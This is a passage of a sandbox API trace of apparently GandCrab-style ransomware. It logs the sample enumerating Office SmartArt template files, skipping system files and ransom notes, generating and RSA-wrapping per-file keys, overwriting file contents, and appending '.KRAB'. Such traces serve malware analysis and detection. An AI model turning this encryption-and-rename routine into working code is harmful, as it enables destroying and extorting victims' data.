lpNumberOfBytesRead=0x338ddfc*=0x10e6, lpOverlapped=0x0) returned 1 [0073.234] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffef1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.234] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x10e6, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x10e6, lpOverlapped=0x0) returned 1 [0073.234] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.234] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.238] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.238] CloseHandle (hObject=0x484) returned 1 [0073.245] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.246] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328932[[fn=picture frame]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328932[[fn=picture frame]].glox.krab")) returned 1 [0073.247] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.247] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.247] lstrcmpW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2=".") returned 1 [0073.247] lstrcmpW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="..") returned 1 [0073.247] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328935[[fn=Picture Organization Chart]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox" [0073.247] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.248] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox.KRAB") returned 157 [0073.248] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 152 [0073.248] lstrlenW (lpString=".glox") returned 5 [0073.248] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.250] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.250] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.251] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 152 [0073.251] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 152 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="desktop.ini") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="autorun.inf") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="ntuser.dat") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="iconcache.db") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="bootsect.bak") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="boot.ini") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="ntuser.dat.log") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="thumbs.db") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="ntldr") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="NTDETECT.COM") returned 1 [0073.251] lstrcmpiW (lpString1="TM03328935[[fn=Picture Organization Chart]].glox", lpString2="Bootfont.bin") returned 1 [0073.251] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.252] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.252] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.253] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.253] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.253] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.253] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.253] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.253] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0073.254] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.254] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.254] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.254] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.254] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.254] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.255] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.255] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023838) returned 1 [0073.255] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.255] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.270] GetLastError () returned 0x0 [0073.270] CryptDestroyKey (hKey=0x1023838) returned 1 [0073.270] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.270] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0073.271] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023878) returned 1 [0073.271] CryptGetKeyParam (in: hKey=0x1023878, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.271] CryptEncrypt (in: hKey=0x1023878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.271] GetLastError () returned 0x0 [0073.271] CryptDestroyKey (hKey=0x1023878) returned 1 [0073.271] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.272] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328935[[fn=picture organization chart]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.273] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.274] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.274] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1cca, lpOverlapped=0x0) returned 1 [0073.302] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffe336, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.302] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1cca, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1cca, lpOverlapped=0x0) returned 1 [0073.302] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.302] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.306] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.306] CloseHandle (hObject=0x484) returned 1 [0073.309] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.309] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328935[[fn=picture organization chart]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328935[[fn=picture organization chart]].glox.krab")) returned 1 [0073.310] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.311] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.321] lstrcmpW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2=".") returned 1 [0073.321] lstrcmpW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="..") returned 1 [0073.321] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328940[[fn=Radial Picture List]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox" [0073.321] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.321] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox.KRAB") returned 150 [0073.321] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 145 [0073.321] lstrlenW (lpString=".glox") returned 5 [0073.321] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.322] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.322] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 145 [0073.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 145 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="desktop.ini") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="autorun.inf") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="ntuser.dat") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="iconcache.db") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="bootsect.bak") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="boot.ini") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="ntuser.dat.log") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="thumbs.db") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.322] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.323] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.323] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="ntldr") returned 1 [0073.323] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="NTDETECT.COM") returned 1 [0073.323] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="Bootfont.bin") returned 1 [0073.323] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.323] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.323] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.324] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.324] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.324] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.324] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.324] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.324] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.325] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.325] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.325] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.325] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.325] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.326] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.326] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0073.328] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x10239b8) returned 1 [0073.328] CryptGetKeyParam (in: hKey=0x10239b8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.328] CryptEncrypt (in: hKey=0x10239b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.329] GetLastError () returned 0x0 [0073.329] CryptDestroyKey (hKey=0x10239b8) returned 1 [0073.329] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.329] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.329] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023cf8) returned 1 [0073.329] CryptGetKeyParam (in: hKey=0x1023cf8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.329] CryptEncrypt (in: hKey=0x1023cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.330] GetLastError () returned 0x0 [0073.330] CryptDestroyKey (hKey=0x1023cf8) returned 1 [0073.330] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.330] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328940[[fn=radial picture list]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.373] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.374] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.374] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x15dc, lpOverlapped=0x0) returned 1 [0073.387] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffea24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.387] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15dc, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x15dc, lpOverlapped=0x0) returned 1 [0073.387] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.388] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.394] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.394] CloseHandle (hObject=0x484) returned 1 [0073.395] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.395] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328940[[fn=radial picture list]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328940[[fn=radial picture list]].glox.krab")) returned 1 [0073.397] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.397] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.397] lstrcmpW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2=".") returned 1 [0073.397] lstrcmpW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="..") returned 1 [0073.397] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328951[[fn=Tabbed Arc]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox" [0073.397] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.397] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox.KRAB") returned 141 [0073.398] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 136 [0073.398] lstrlenW (lpString=".glox") returned 5 [0073.398] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.398] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.398] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.398] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 136 [0073.398] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 136 [0073.398] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="desktop.ini") returned 1 [0073.398] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="autorun.inf") returned 1 [0073.398] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="ntuser.dat") returned 1 [0073.398] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="iconcache.db") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="bootsect.bak") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="boot.ini") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="ntuser.dat.log") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="thumbs.db") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="ntldr") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="NTDETECT.COM") returned 1 [0073.399] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="Bootfont.bin") returned 1 [0073.399] VirtualAlloc (lpAddress=0x0, 